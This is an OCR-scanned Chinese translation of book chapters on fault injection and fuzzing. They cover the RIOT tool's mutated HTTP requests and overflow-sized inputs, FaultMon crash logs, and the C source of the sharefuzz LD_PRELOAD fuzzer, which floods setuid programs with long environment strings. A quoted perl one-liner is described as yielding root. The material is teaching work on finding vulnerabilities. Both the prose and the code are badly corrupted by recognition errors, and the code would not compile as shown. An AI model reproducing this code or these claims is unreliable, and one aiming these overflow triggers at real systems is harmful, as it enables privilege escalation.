测试 每 一 个 故障 。 如 果 有 10 个 输入 数据 ， 每 个 输入 数据 有 5 000 个 插入 点 ， 而 我 们 的 引擎 可 以 提 
供 1 000 个 故障 ， 那 么 当 测 试 结束 时 ， 我 们 可 能 已 经 抱 上 孙子 了 。 

为 了 不 再 在 输入 数据 的 每 个 字 节 之 后 循环 插入 故障 ,我们 可 以 按 一 定 的 逻辑 , 用 分 隔 符 把 输 
入 数据 分 成 不 同 的 单元 。 这 样 的 话 ， 我 们 就 可 以 在 输入 数据 的 每 个 单元 之 后 插入 故障 ， 而 不 必 在 
每 个 字符 之 后 插入 故障 了 。 比 如 说 ， 上 面 的 例子 可 以 按 逻 辑 分 为 : 方法 、URI、 协 议 版 本 号 、 头 
名 称 、 头 值 。 如 果 需 要 进一步 分 解 ， 还 可 以 考虑 URL 的 文件 扩展 名 、 协 议 的 主 / 次 版 本 号 ， 甚 至 
包括 国家 代码 或 域名 的 根 DNS。 为 被 测试 协议 的 每 个 单元 提供 手动 支持 是 一 个 非常 艰巨 的 任务 ， 
率 好 有 很 多 方法 。 

1. 分 隔 符 逻辑 

开发 者 在 创建 分 析 程 序 时 ， 通 常用 可 视 符号 〈 如 # 或 $) 作为 分 隔 标记 ， 一 般 很 少 用 字母 或 
数字 。 

为 了 解释 这 个 概念 ， 先 看 下 面 的 例子 。 如 果 用 1 分 隔 协议 的 主 、 次 版 本 号 ， 那 么 在 下 面 的 输 
入 数据 中 ， 怎 样 确定 协议 版 本 呢 ? 

GET /index.html HTTP/111 、 

如 果 用 字母 或 数字 作为 分 隔 符 号 , 那 怎么 命名 或 描述 数据 呢 ? 可 以 用 特殊 的 符号 帮助 我 们 理 
解 信息 ， 例 如 本 例 中 的 句点 。 

GET /index.html HTTP/1.1 

通信 的 主要 组 成 成 分 是 信息 分 布 的 频率 和 均衡 性 以 及 信 元 之 间 的 分 隔 。 设 想 一 下 , 如 果 我 们 
移 走 本 章 中 的 非 字 母 或 数字 ， 没 有 空格 ， 没 有 句点， 除了 字母 和 数字 什么 都 没有 ， 那 么 要 想 读 懂 
本 章 内 容 将 是 非常 困难 的 。 幸 好 人 类 的 大 脑 有 一 个 伟大 之 处 ， 它 可 以 根据 已 学 的 知识 做 出 判断 ， 
因此 ， 当 我 们 看 到 杂乱 无 章 的 信息 时 ,可 以 很 快 辨认 出 什么 是 有 意义 的 , 什么 是 无 意义 的 。 但 是 ， 
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软件 并 不 具备 同样 的 智能 ， 因 此 ， 我 们 必须 用 适当 的 协议 标准 将 信息 格式 化 ， 以 便 和 软件 进行 正 
确 的 通信 。 

在 应 用 层 协议 里 格式 化 数据 主要 依赖 定义 符 〈delimiting)。 定 义 符 通常 是 可 打印 的 、 非 字母 
数字 的 ASCII 字 符 。 下 面 看 另外 一 个 输入 数据 ， 这 次 ， 我 们 用 不 常见 的 \ 转 义 字 符 。 

GET /index.html HTTP/1.1\r\nHost: test.com\r\n\r\n 

TER, 在 这 个 输入 数据 里 ， 每 个 单元 都 用 分 隔 符 分 开 了 。 方法 用 空格 分 隔 ，URI 用 空格 分 隔 ， 
协议 版 本 号 用 正 斜 杠 分 隔 ， 主 版 本 号 用 旬 号 分 隔 ， 次 版 本 号 用 回 车 换行 ， 头 名 称 用 冒号 分 隔 ， 紧 
接着 的 头 值 用 两 个 回 车 换行 分 隔 。 因 此 ， 只 需 把 与 特殊 符号 相关 的 故障 插入 输入 数据 里 ， 就 几乎 
能 测试 到 每 一 个 协议 单元 ， 而 不 需要 知道 它 的 细节 。 我 们 将 在 分 隔 符 的 前 /后 插入 故障 ， 因 此 ， 
我 们 的 输入 数据 将 不 会 出 现 审计 分 配 或 边界 方面 的 问题 。 

我 们 用 故障 BEYE2003 重 复 运 行 10 次 ， 对 比 一 下 顺序 生成 的 测试 序列 和 用 分 隔 符 逻辑 生成 的 
测试 序列 。 

顺序 生成 的 测试 序列 : 

EEYE2003GET /index.html HTTP/1.1\r\nHost: test.com\r\n\r\n 

GEEYE2003ET /index.html HTTP/1.1\r\nHost: test.com\r\n\r\n 

GEEEYE2003T /index.html HTTP/1.1\r\nHost: test.com\r\n\r\n 

GETEEYE2003 /index.html HTTP/1.1\r\nHost: test.com\r\n\r\n 

GET EEYE2003/index.html HTTP/1.1\r\nHost: test.com\r\n\r\n 

GET /EEYE2003index.html HTTP/1.1\r\nHost: test.com\r\n\r\n 

GET /iEEYE2003ndex.html HTTP/1.1\r\nHost: test.com\r\n\r\n 

GET /inEEYE2003dex.html HTTP/1.1\r\nHost: test.com\r\n\r\n 


GET /indEEYE2003ex.html HTTP/1.1\r\nHost: test.com\r\n\r\n 
GET /indeEEYE2003x.html HTTP/1.1\r\nHost: test.com\r\n\r\n 


分 隔 符 逻辑 生成 的 测试 序列 : 

GETEEYE2003 /index.html HTTP/1.1\r\nHost: test.com\r\n\r\n 
GET EEYE2003/index.html HTTP/1.1\r\nHost: test.com\r\n\r\n 
GET EEYE2003/index.html HTTP/1.1\r\nHost: test.com\r\n\r\n 
GET /EEYE2003index.html HTTP/1.1\r\nHost: test.com\r\n\r\n 
GET /indexEEYE2003.html HTTP/1.1\r\nHost: test.com\r\n\r\n 
GET /index.EEYE2003html HTTP/1.1\r\nHost: test.com\r\n\r\n 
GET /index.htmlEEYE2003 HTTP/1.1\r\nHost: test.com\r\n\r\n 
GET /index. html EEYE2003HTTP/1.1\r\nllost: test.com\r\n\r\n 
GET /index.html HTTPEEYE2003/1.1\r\nHost: test.com\r\n\r\n 
GET /index.html HTTP/EEYE20031.1\r\nHost: test.com\r\n\r\n 


这 个 例子 表明 ， 即 使 输入 数据 很 简单 ， 使 用 分 隔 符 逻辑 也 可 以 显著 提升 性 能 。 CES 
个 输入 数据 的 系统 里 ， 当 用 几乎 无 限 种 故障 进行 测试 时 ， 经 过 这 样 的 优化 后 ， 节 省 的 时 间 即 使 不 
以 年 计 ， 至 少 也 能 以 月 或 星期 来 衡量 。 可 以 说 任何 人 都 可 以 写 出 在 几 年 内 找 出 安全 问题 的 测试 程 
序 ， 但 只 有 极 少数 人 可 以 写 出 在 5 分 钟 内 找 出 安全 问题 的 测试 程序 。 

2. 规避 输入 处 理 系 统 

我 们 已 经 讨论 过 应 该 在 哪些 地 方 插 入 故障 , 现在 来 讨论 什么 才 是 真正 的 故障 。 假设 修正 引擎 
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在 寻找 缓冲 区 溢出 的 过 程 中 选择 了 一 个 故障 ， 这 个 故障 是 1024 个 x 字符 。 我 们 用 这 个 故障 可 能 会 
在 目标 程序 中 发 现 问 题 , 但 目标 程序 可 能 对 缓冲 区 的 大 小 、 内 容 等 有 诸多 限制 ， 所 以 ， 发 现 问 题 
的 概率 比较 小 。 因 此 ， 如 果 提 交 的 测试 序列 不 能 通过 目标 程序 的 输入 处 理 系 统 ， 那 目标 程序 的 错 
误 处 理 例 程 可 能 会 浪费 很 多 时 间 。 

目标 程序 通常 会 限制 每 个 协议 单元 的 大 小 。 例 如 ，HTTP 方法 的 长 度 可 能 限制 为 128B， 但 目 
标 程序 接受 输入 数据 后 ， 把 它 复制 到 32B 的 静态 缓冲 区 。 但 因为 我 们 选择 的 故障 是 1 024B (大 大 
超出 了 128B 的 限制 )， 所 以 目标 程序 将 丢弃 测试 序列 并 返回 错误 ， 从 而 导致 故障 永远 都 不 会 到 达 
脆弱 的 缓冲 区 。 

那 怎 么 解决 这 个 问题 呢 ? 也 许 我 们 可 以 自 定义 缓 冲 区 的 大 小 ， 例 如 从 1 到 1 024， 在 测试 过 程 
中 ， 每 次 递增 1B， 这 样 的 话 ， 总 有 一 次 可 以 符合 目标 程序 的 要 求 。 但 是 ， 假 设 有 几 百 个 单元 的 输 
入 数据 ， 每 个 单元 都 注入 1 024 种 故障 的 话 ， 那 么 完成 这 种 测试 要 花 的 时 间 可 能 会 长 得 吓人 。 因 
此 ， 按 某 个 范围 自动 生成 故障 的 做 法 并 不 妥当 。 

当 处 理 缺 乏 源 码 的 程序 时 , 我 们 可 以 查看 与 这 类 程序 类 似 的 开源 程序 ， 了 解 它们 的 开发 者 怎 
样 实现 类 似 的 数据 结构 〈 如 缓冲 区 的 大 小 )。 比 如 说 ， 当 审计 缺乏 源码 的 HrmP 服 务 程序 时 ， 可 以 
查看 一 些 开 源 程 序 〈 例 如 Apache、Sendmail、Samba) 的 源码 。 通 过 这 些 源 码 ， 我 们 可 以 大 概 了 
解 到 常用 的 缓冲 区 大 小 。 经 过 统计 , 我 们 发 现 大 多 数 的 缓冲 区 大 小 是 32 乘 以 2 的 z 次 方 , 如 32、64、 
128. 256. 512. 1 024 等 ， 少 数 是 乘 以 10 的 z 次 方 ; 其 他 的 也 和 这 些 类 似 ， 只 是 可 能 会 加 上 或 减 
去 某 个 变量 ， 变 量 取 值 范围 一 般 在 1 到 20 之 间 。 

根据 这 些 统计 ， 我 们 可 以 创建 一 个 可 能 触发 大 多 数 缓冲 区 溢出 的 缓冲 区 大 小 列表 , 并 在 缓冲 
区 的 前 /后 加 上 较 小 的 增 量 〈 这 主要 是 解决 程序 在 声明 变量 时 提 到 的 附加 成 分 )。 为 了 证 实 这 些 测 
试 序列 是 否 有 效 ， 最 好 的 办 法 是 用 它们 测试 有 已 知 缓冲 区 溢出 漏洞 的 程序 。 通 过 使 用 缓冲 区 大 小 
列表 ,可 以 发 现 这 些 测试 序列 几乎 可 以 再 现 目 标 程序 里 的 每 一 个 缓冲 区 溢出 。 我 们 再 也 不 必 像 以 
前 那样 为 每 个 协议 单元 都 准备 7 万 多 种 故障 注入 数据 ， 现 在 只 需 800 种 就 足够 了 。 

大 型 软件 为 了 避免 潜在 的 问题 ， 在 接受 输入 时 ,通常 会 对 输入 内 容 进 行 检验 。 虽 然 这 种 行为 
不 属于 安全 编程 的 范畴 ,但 它 的 存在 的 确 使 发 现 或 破解 漏洞 变 得 更 困难 了 。 如 果 想 审计 目标 程序 
中 存在 未 知 漏洞 的 角落 ， 可 能 要 设法 绕 过 目标 程序 对 输入 内 容 的 诸多 限制 。 目 标 程序 通常 将 接受 
输入 的 字段 限制 为 数字 、 大 写字 母 或 某 种 编码 后 的 数据 。 一 般 用 isdigit()、isalpha()、 
isupper ()、islower()、isascii() 等 C 函 数 检验 输入 内 容 。 

如 果 协 议 单元 只 支持 数字 , 而 我 们 注入 的 故障 却 包 含 了 非 数字 的 数据 , 那么 目标 软件 在 调用 
isdigit () 之 后 ,会 根据 isdigit () 的 结果 返回 错误 。 通 过 注入 反映 进程 运行 环境 的 故障 ， 我 们 
可 以 绕 过 大 多 数 类 似 的 限制 , 下面 是 一 个 普通 的 故障 注入 会 话 和 一 个 反映 了 进程 运行 环境 的 故障 
注入 会 话 之 间 的 比较 。 

一 个 缓冲 区 大 小 为 10 的 例子 将 产生 如 下 可 注入 的 故障 输入 流 : 

GETTTTTTTTT /index.html HTTP/1.1\r\nHost: test.com\r\n\r\n 


GET ///////////index.html HTTP/1.1\r\nHost: test.com\r\n\r\n 
GET /index.html HTTP/1,1\r\nHost: test.com\r\n\r\n 
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GET /iiiiiiiiiiindex.html HTTP/1.1\r\nHost: test.com\r\n\r\n 
GET /indexxxxxxxxxxx. html HTTP/1.1\r\nHost: test.com\r\n\r\n 
GET /index.hhhhhhhhhhhtml HTTP/1.1\r\nHost: test.com\r\n\r\n 
GET /index.htmmmmmmmmmmm HTTP/1.1\r\nHost: test.com\r\n\r\n 
GET /index.html HHHHHHHHHHHTTP/1.1\r\nHost: test.com\r\n\r\n 
GET /index. html HTTPPPPPPPPPPP/1.1\r\nHost: test.com\r\n\r\n 
GET /index.html HTTP/11111111111.1\r\nHost: test.com\r\n\r\n 


16.1.4 提交 故障 

现在 的 硬件 故障 注入 设备 一 般 是 通过 改变 电压 、 通 过 引线 注入 测试 数据 ， 其 至 是 EMI 独 发 来 
提交 故障 。 软 件 测试 时 ， 一 般 是 通过 目标 程序 可 以 接受 输入 数据 的 媒介 来 提交 故障 ， 例 如 在 
Windows 里 ， 可 以 通过 文件 系统 、 注 册 表 、 环 境 变 量 、Windows 消 息 、LPC 端 口 、RPC、 共 享 内 
存 、 命 令 行 参 数 、 网 络 输入 或 其 他 媒介 来 提交 故障 。 现 在 软件 使 用 的 最 重要 的 通信 媒介 是 TCP/IP 
网 络 协议 ， 通 过 这 些 协议 ， 我 们 可 以 和 远 在 地 球 另 一 边 的 、 有 漏洞 的 软件 进行 通信 。 本 节 将 讨论 
通过 网 络 协议 提交 故障 的 方法 和 指导 方针 。 

提交 的 输入 数据 源 自修 正 引擎 。 在 修正 引擎 每 次 的 重复 过 程 中 , 我 们 可 以 通过 TCP/IP 网 络 函 
数 ， 把 修改 后 的 输入 数据 交 给 目标 程序 。 在 修改 输入 数据 后 ， 可 以 按 如 下 步骤 提交 数据 ; 

(1) 和 目标 程序 建立 网 络 连接 。 

(2) 通过 连接 提交 修改 后 的 输入 数据 。 

(3) 短暂 的 等 待 响应 。 

(4) 关闭 网 络 连接 。 


16.1.5 Nagel 算法 

Windows IP 栈 默 认 使 用 Nagel 算 法 ， 这 个 算法 暂缓 小 数据 报 文 的 传输 ， 直 到 这 些小 数据 报 文 
累计 到 一 定 的 数量 后 再 提交 给 程序 。 因 为 我 们 的 测试 分 成 创建 、 提 交 、 监 控 三 个 阶段 ， 所 以 可 以 
通过 设置 NO_DELAY 标 记 来 禁用 Nagel 算 法 。 


16.1.6 时序 

时 序 〈timing) 的 问题 比较 难 解决 。 很 多 解决 方案 倾向 于 选择 灵活 的 时 序 ， 以 适应 服务 器 的 
响应 ， 田 一些 解 决 方案 为 了 减少 测试 时 间 ， 人 允许 对 时 序 进行 微调 。RIOT 介 于 两 者 之 间 ， 可 以 进 
行 灵活 的 配置 。 建 议 你 了 解 一 下 可 配置 的 时 序 ， 以 便 为 目标 程序 选择 合适 的 值 。 通 常 来 说 ， 那 些 
只 响应 有 效 输入 的 服务 器 ， 可 能 接受 很 短 的 超时 ， 而 那些 不 管 请 求 类 型 总 是 做 出 响应 的 服务 器 ， 
可 能 会 接受 较 长 的 超时 。 当 然 ， 最 好 的 方法 是 自己 动手 写 一 个 时 序 算 法 ， 并 在 审计 开始 时 动态 调 
整 时 序 。 
16.1.7 试探 法 

人 们 通常 热衷 于 那些 可 以 自我 调整 以 适应 各 种 情形 的 软件 。 虽 然 试探 法 还 算 不 上 真正 的 人 工 
智能 ， 但 它 已 经 向 正确 的 方向 迈 出 了 一 步 ， 为 故障 注入 系统 带 来 额外 的 优势 。 试 探 法 是 与 对 方 交 
流 并 观察 其 反应 的 科学 。 如 果 你 想 在 故障 注入 系统 中 加 入 试探 法 , 那么 只 需 在 提交 测试 序列 的 代 
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码 段 的 接收 部 分 之 后 加 上 对 回 拨 的 支持 。 你 可 以 以 检查 服务 器 响应 的 错误 代码 开始 ， 当 审计 程序 
收 到 服务 器 返回 的 错误 〈 如 Internet Server 错 误 ) 时 ， 先 做 一 个 标记 ， 使 审计 程序 在 响应 返回 前 暂 
时 变 得 更 主动 一 些 。 昌 然 错误 配置 、 初 始 化 功能 失效 都 有 可 能 产生 这 种 类 型 的 Web Server 错 误 ， 
但 应 该 注意 的 是 ， 进 程 地 址 空间 的 恶化 也 会 产生 这 类 错误 。 
16.1.8 无 状态 协议 与 基于 状态 的 协议 

网 络 协议 可 以 分 成 两 大 类 : 无 状态 协议 和 基于 状态 的 协议 。 无 状态 协议 很 容易 审计 ， RNA 
需 把 故障 提交 给 远程 服务 器 ， 然 后 观察 它 的 响应 就 可 以 了 ， 但 审计 基于 状态 的 协议 要 难 一 些 。 只 
有 少数 故障 注入 系统 可 以 审计 复杂 的 、 基 于 状态 的 协议 。 审 计 的 难度 和 协议 协商 的 复杂 度 有 关 ， 
例如 ， 如 今 的 软件 通常 都 包含 复杂 的 客户 -服务 器 协议 ， 在 整个 会 话 过 程 中 ， 通信 双方 需要 进行 
非常 详细 的 协商 ， 这 样 一 来 将 导致 简单 的 逻辑 分 析 不 能 重 现 整个 协商 过 程 。 

少数 研究 者 已 经 成 功 开 发 出 完全 针对 协议 数据 进行 逻辑 分 析 的 、 基 于 状态 的 审计 系统 。 基 于 
状态 的 审计 系统 需要 辅助 码 和 定义 每 个 协议 状态 的 复杂 的 具体 协议 项 来 配合 实现 。 


16.2 ”故障 监视 


故障 监视 是 故障 测试 过 程 中 最 容易 被 忽视 的 一 环 , 但 实际 上 它 很 关键 。 学 院 派 开 发 的 大 多 数 
故障 注入 系统 一 般 只 在 程序 退出 或 生成 核心 时 才 检 测 失败 ， 大 型 软件 通常 利用 异常 处 理 、 信 和 号 处 
理 或 操作 系统 自 带 的 故障 处 理 程序 构造 强壮 的 故障 容错 系统 。 通过 操作 系统 自 带 的 调试 子 系统 监 
视 故 障 ， 可 以 发 现 一 些 以 前 被 忽视 的 人 为 故障 。 

16.2.1 使 用 调试 器 

如 果 你 准备 以 交互 方式 测试 故障 ， 那么 调试 器 正好 符合 你 的 需求 。 选 择 合适 的 调试 器 ， 用 它 
附 上 目标 程序 的 进程 。 大 多 数 的 调试 器 在 默认 情况 下 只 捕获 那些 没有 被 进程 处 理 的 异常 ,例如 未 
经 处 理 的 异常 。 其 他 的 调试 器 只 允许 捕获 未 经 处 理 的 异常 。 如 果 你 的 调试 器 可 以 在 异常 传 给 进程 
之 前 抢先 捕获 它 ， 那 我 们 建议 你 监视 每 个 需要 关注 的 异常 。 提 醒 一 下 ， 需 要 重点 监视 的 是 访问 违 
例 异常 ， 当 进程 的 线程 企图 访问 无 效 的 内 存 地 址 时 会 发 生 访 问 违例 ， 当 数据 结构 指定 的 引用 内 存 
在 程序 运行 期 间 被 破坏 时 ， 我 们 也 可 以 看 到 这 样 的 违例 。 


16.2.2 FaultMon 

但 是 调试 器 很 少 提供 记录 异常 信息 并 继续 运行 的 功能 。 为 了 弥补 这 个 缺陷 , 我 们 在 本 书 配套 
网 站 (http://www.wiley.com/go/shellicodershandbook) 上 提供 FaultMon， 它 是 eEye 的 研究 员 Derek 
Soeder 所 写 的 实用 工具 。 要 使 用 FaultMon， 只 需 打 开 命 令 行 窗口 ， 输 入 目标 进程 的 DD。 当 异常 产 
生 时 ，FaultMon 将 在 控制 人 台 上 显示 相关 信息 。 


21:29:44.985 pid=0590 tid=0714 EXCEPTION (first-chance) 


Exception C0000005 (ACCESS VIOLATION writing [OFFO2C4D}) 


EAX-OOEFEBA8: 48 00 00 00 00 00 FO 00-00 DO EF 00 00 00 00 00 








EBX-00EFF094: 41 00 41 00 41 00 41 00-02 00 41 00 41 00 41 00 
ECX-00410041: 00 00 00 A8 05 41 00 OF-00 00 00 F8 FF FF FF 50 
EDX-77F8A896: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00 
ESP-O0EFEABO: 38 25 F9 77 70 EB EF 00-94 FO EF 00 8C EB EF 00 
EBP-OOEFEADO0: 58 EB EF 00 89 AF F8 77-70 EB EF 00 94 FO EF 00 
ESI-OOEFEB70: 05 00 00 CO 00 00 00 00-00 00 00 00 B4 69 CC 68 
EDI-00000001: ?? ?? ?? ?? ?? ?? ?? ??-9? ?? ?? ?? 2? ?? ?? ?9? 
EIP-00410043: 00 A8 05 41 00 OF 00 00-00 F8 FF FF FF 50 00 41 
--> ADD [EAX+0F004105],CH 


Continue? y/n: 
这 里 显示 的 内 容 是 在 RIOT 测 试 的 过 程 中 由 FaultMon 捕 获 的 。 交 互 式 选 项 为 -1， 如 果 设 置 这 
个 选项 ， 我 们 可 以 在 两 次 异常 之 间 暂 停 并 查看 程序 的 状态 。 


16.3 汇总 


我 们 在 本 书 的 配套 网 站 上 提供 了 RIOT 的 源码 及 编译 好 的 Win32 版 本 。 要 运行 RIOT， 只 需 把 
RIOT 和 FaultMon 复 制 到 计算 机 的 同一 目录 下 即 可 。 我 们 将 用 前 面 讨论 的 输入 数据 进行 一 次 简单 
的 测试 。 

GET /search.ida?group-kuroto&q-riot HTTP/1.1 

Accept: */* 

Accept-Language: en-us 

Accept-Encoding: gzip, deflate 

User-Agent: Mozilla/4.0 

Host: 192.168.1.1 


Connection: Keep-Alive 
Cookie: ASPSESSIONIDONNNNTEG-ODDDDIOANNCXXXXIIMGLLNNG 


不 用 担心 这 个 测试 ， 我 们 已 经 为 你 准备 好 了 。 你 只 需 打 开 两 个 命令 shell (cmd.exe). 8&5— 
个 命令 shell 必 须 在 你 想 测试 的 、 运 行 有 潜在 漏洞 的 Web 服 务 器 上 打开 ， 我 们 在 第 一 个 命令 shell 里 
运行 FaultMon， 并 把 在 后 台 运 行 的 Web 服 务 器 的 进程 ID 交 给 它 。 如 果 你 正在 运行 IIS 5.0， 那 么 使 
用 inetinfo.exe 的 进程 ID。 如 果 inetinfo.exe 的 进程 ID 是 2003， 那 么 在 第 一 个 命令 行 窗 口 里 要 输 
入 : 

faultmon.exe -i 2003 

在 FaultMon 启 动 过 程 中 ， 会 看 到 窗口 显示 了 一 系列 的 信息 ， 可 以 忽略 这 些 信息 ， 它 们 和 
FaultMon 的 初始 化 有 关 ， 和 测试 无 关 。 至 此 ，FaultMon 已 经 正常 运行 并 开始 监视 事件 了 ， 我 们 在 
发 起 攻击 的 机 器 上 打开 另 一 个 shell。 

第 二 个 窗口 应 该 是 在 RIOT 所 在 的 机 器 上 打开 。 在 窗口 里 启动 RIOT， 输 入 目标 主机 的 IP 地 址 
和 Web 上 服务器 监听 的 端口 号 。 如 果 Web 服 务 器 的 IP 地 址 是 192.168.1.1， 端 口 是 80， 那 么 输入 下 列 
fn: 


riot.exe -p 80 192.168.1.1 
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RIOT 自 带 的 输入 文件 允许 在 大 型 Web 服 务 器 上 发 现 那些 已 知 的 缓冲 区 溢出 漏洞 。 如 果 你 审 
计 的 是 只 打 过 早期 补丁 的 Windows 2000 服 务 器 ， 很 可 能 会 再 次 发 现 红色 代码 所 利用 的 漏洞 。 

RIOT 目 录 里 的 每 个 文件 都 包含 了 详细 的 测试 数据 。ROIT 从 ID 1 开始 ， 顺 序 递增 直至 整个 测 
试 结束 。 当 然 ， 你 也 可 以 编辑 这 些 文件 ， 创 建 你 自己 喜欢 的 测试 序列 。 我 们 还 提供 了 源码 ， 你 可 
以 根据 这 些 信息 ， 构 建 属 于 自己 的 故障 注入 系统 的 框架 。 漏 洞 猎人 的 幸福 生活 由 此 开始 唆 ! 


16.4 “小 结 


在 本 章 ， 我 们 学 习 了 与 模糊 测试 密切 相关 的 故障 注入 ， 也 演示 了 怎样 用 RIOT 创 建 故障 ， 以 
及 怎么 用 FaultMon 监 视 目 标 程序 。 
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派 人 士 关注 并 研究 那些 “可 验证 ”的 安全 技术 ， 但 大 多 数 工 作 在 一 线 的 安全 研究 者 更 
关注 那些 能 迅速 看 到 结果 的 技术 。 TEASE, 我们 把 精力 放 在 漏洞 发 握 的 幕后 工作 和 方法 上 本 节 内 
容 是 对 前 几 章 内 容 的 补充 ， 并 且 更 有 意思 。 然 而 ， 请 大 家 记 住 ， 尽 管 对 常见 漏洞 的 研究 分 析 已 经 
基本 结束 ， 但 以 后 寻找 安全 漏洞 绝 大 部 分 还 要 看 运气 。 本 章 就 是 教 你 如 何 碰 到 好 运气 。 


17.1 模糊 测试 理论 


模糊 测试 是 一 个 广义 的 概念 ， 其 中 包括 故障 注入 技术 〈 在 第 16 章 有 详细 的 介绍 )。 在 软件 安 
全 的 世界 里 ， 故 障 注 入 通常 是 通过 直接 操作 程序 内 部 API〈 通 常 使 用 某 种 形式 的 调试 器 或 库 函 数 
调用 拦截 器 )， 提 交 非 正常 的 数据 给 目标 程序 。 例 如 ， 你 可 以 让 free() 调 用 返回 NULL (意味 着 调 
用 失败 )， 或 让 getenv() 返 回 长 字符 串 。 和 这 个 主题 相关 的 很 多 资料 都 讨论 了 用 仪器 装备 可 执行 
文件 ， 然 后 把 非 正 常 的 数据 注入 运行 中 的 程序 〈 可 执行 文件 )。 也 就 是 说 ， 它 们 使 Free() 返 回 0， 
然后 用 Venn Diagrame 讨 论 事件 的 统计 值 。 如 果 是 想 随 机 发 生 的 硬件 故障 ， 整 个 过 程 就 更 有 意义 
了 ， 但 我 们 要 寻找 的 是 除了 随机 事件 以 外 的 任何 错误 。 在 寻找 漏洞 方面 ， 测 试 设备 是 有 价值 的 ， 
但 只 有 与 合适 的 模糊 测试 方法 配合 使 用 ， 也 就 是 说 它 变 成 运行 时 分 析 才 能 体现 出 它 的 价值 。 

sharefuzz 是 一 个 典型 的 模糊 测试 故障 注入 工具 ， 可 以 从 http://www.immunitysec.com/ 
resources-freesoftware.shtml 网 站 下 载 。 它 和 Solaris 或 Linux 的 共享 库 类 似 ， 用 于 测试 setuid 程 序 是 
否 有 本 地 缓冲 区 溢出 漏洞 。 你 一 定 看 过 “使 用 TERM='perl -e ‘print "A" X 
5000'' ./setuid.binary 可 以 得 到 root” 这 样 的 描述 ， 通 过 使 发 现 过 程 完全 自动 化 ，sharefuzz 
可 以 提供 很 多 这 样 无 意义 的 建议 。sharefuzz 在 很 大 的 范围 内 取得 了 成 功 ， 比 如 说 ， 它 在 成 型 后 的 
一 周 内 就 发 现 了 Solaris 里 的 1ibsldap .so 的 漏洞 (尽管 当时 没有 报告 给 Sun， 后 来 ， 这 个 漏洞 被 
其 他 的 安全 研究 者 报告 给 了 Sun)。 


$ 糊 测试 是 一 个 动态 的 过 程 ， 它 涵盖 了 为 发 据 已 发 现 的 漏洞 所 做 的 各 种 尝试 。 尽 管 学 院 


QD 可 译 为 范 因 图 、 范 氏 图 、 文 氏 图 、 维 恩 图 、 范 恩 图 解 等 ， 这 里 保留 原文 。 具体 意思 有 两 种 。 一 种 指 图 解 ， 利 用 画 
在 一 个 表面 上 的 一 些 区 域 来 表示 一 些 集合 ; 另 一 种 也 指 一 种 图 解 ， 利 用 一 些 圆圈 或 椭圆 来 作为 基本 逻辑 关系 的 图 
形 表示 法 。 类 别 、 类 别 的 运算 和 命题 的 项 目 由 包含 、 不 包含 或 图 形 的 交集 来 表示 和 界定 ， 具 有 阴影 的 地 方 表示 空 
的 区 域 ， 交 错 的 地 方 表示 不 是 空 的 区 域 ， 而 空白 的 空间 表示 可 以 是 任何 一 种 的 区 域 。 这 种 图 解 是 为 纪念 英国 的 逻 
辑 学 家 John Venn 而 命名 的 。 一 一 译 者 注 
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为 了 理解 sharefuzz 的 内 部 机 理 ， 让 我 们 仔细 研究 一 下 其 代码 架构 。 


/*sharefuzz.c - a fuzzer originally designed for local fuzzing 
but equally good against all sorts of other clib functions. Load 
with LD PRELOAD on most Systems. 


LICENSE: GPLv2 
*/ 


#include <stdio.h> 


/*defines*/ 
/*#define DOLOCALE /*LOCALE FUZZING* / 


#define SIZE 11500 /*size of our returned environment*/ 

#define FUZCHAR 0x41 /*our fuzzer character*/ 

static char *stuff; 

static char *stuff2; 

static char display[] = "localhost:0"; /*display to return when asked*/ 
Static char mypath[] - "/usr/bin:/usr/sbin:/bin:/sbin"; 

static char ld preload[]) = ""; 


#include «sys/select.h» 


int select(int n, fd set  *readfds, fq set *writefds, 
fd set *exceptfds, struct timeval *timeout) 


t 
printf("SELECT CALLED! \n"); . 
} 
int 
getuid() 


{ 
printf ("***getuid!\n"); 
return 501; 
} 


int geteuid() 

{ 
printf ("***geteuid\n"); 
return 501; 


int getgid() 

{ 
printf ("getgid\n"); 
return 501; 





int getegid() 

{ 
printf ("getegid\n"); 
return 501; 

} 

int getgid32() 

{ 
printf ("***getgid32\n"); 
return 501; 

} 

int getegid32() 

{ 
printf ("***getegid32\n"); 
return 501; 
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/*Getenv fuzzing - modify this as needed to suit your particular fuzzing needs*/ 


char * 

getenv(char * environment) 

{ 

fprintf(stderr, "GETENV: %s\n",environment); 
fflush(0); 


/*sometimes you don't want to mess with this stuff*/ 
if (!stremp(environment, DISPLAY")) 
return display; 
dif 0 
if (‘strcmp (environment, PATH")) 
{ 
return NULL; 
return mypath; 
} 
#endif 


#if 0 
if (!stremp(environment, "HOME") ) 
return "/home/dave"; 


if (!strcmp(environment,"LD PRELOAD")) 
return NULL; 


if (!strcemp (environment, "LOGNAME") ) 
return NULL; 


if (!stromp(environment, "ORGMAIL") ) 

{ 
fprintf(stderr, "ORGMAIL=%s\n",stuff2); 
return "ASDFASDFsd"; 
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} 
if (!strcmp (environment, "TZ")) 
return NULL; 
#endif 


fprintf(stderr, "continued to return default\n") 

//sleep(1); 
/*return NULL when you don't want to destroy the environment*/ 
//return NULL; 

/*return stuff when you want to return long strings as each variable*/ 
fflush(0); 

return stuff; 


) 


int 

putenv(char * string) 

{ 

fprintf(stderr, "putenv %s\n",string); 
return 0; i 


} 


int 
clearenv () 
{ 
fprintf(stderr,"clearenv Mn"); 
return 0; 


int 
unsetenv(char * string) 


{ 
fprintf(stderr, “unsetenv %s\n", string); 
return 0; 


.init() 
{ 
stuff=malloc(SIZE); 
stuff2=malloc(SIZE); 
printf("shared library loader working\n"); 
memset (stuff, FUZCHAR, SIZE-1); 
stuff [SIZE-1]=0; 
memset (stuff2,FUZCHAR, SIZE-1); 
Stuff2[1]120; 
//system("/bin/sh"); 
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把 这 段 代 码 编译 成 共享 库 ， 然 后 《在 支持 它 的 系统 上 ) 用 LD_PRELOAD 加 载 ， 加 载 结束 后 ， 
sharefuzz 将 接管 getenv() 调用 并 总 是 返回 一 个 长 字符 串 。 有 些 程序 可 能 会 要 求 在 屏幕 的 窗 口 里 输 
出 信息 ， 因 此 为 了 正常 显示 ， 可 以 把 DISPLAY 设 置 成 有 效 的 X Windows 设 备 。 


root 和 商业 模糊 测试 工具 





当然 ， 为 了 在 setuiq 程 序 上 使 用 LD_PRELOAD， 你 必须 以 root 登 录 ， 而 这 会 稍微 改变 模糊 
测试 工具 的 行为 。 不 要 忘 了 ， 有 些 程序 出 错时 不 会 生成 core 文件， 因此 ， 你 可 以 用 gdb 附 上 目 
